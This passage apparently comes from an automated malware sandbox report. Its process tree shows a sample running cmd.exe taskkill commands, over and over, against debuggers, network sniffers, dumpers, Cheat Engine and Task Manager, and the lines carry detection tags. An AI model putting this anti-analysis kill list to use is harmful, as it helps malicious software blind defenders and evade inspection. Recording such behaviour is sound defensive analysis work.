    taskkill /f /im Wireshark.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:4172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:3152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:4692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:4568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3288
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:5036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4824
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4484
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:5088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3592
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3040
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2852
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:1708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Kills process with taskkill
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:4864
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Kills process with taskkill
    PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:2576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1004
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:5072
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4528
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4696
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4236
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3532
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:3240
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:1032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:1868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:5084
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Cerber
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1728
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:5104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3724
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:2772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4292
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:1316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3436
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1512
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4484
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1088
